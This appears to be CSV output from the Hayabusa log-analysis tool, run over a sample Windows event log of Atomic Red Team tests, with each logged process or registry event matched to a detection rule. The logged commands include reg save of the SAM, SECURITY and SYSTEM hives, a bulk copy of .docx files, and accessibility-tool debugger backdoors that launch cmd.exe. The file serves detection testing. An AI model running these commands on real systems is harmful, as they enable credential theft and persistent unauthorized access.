2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
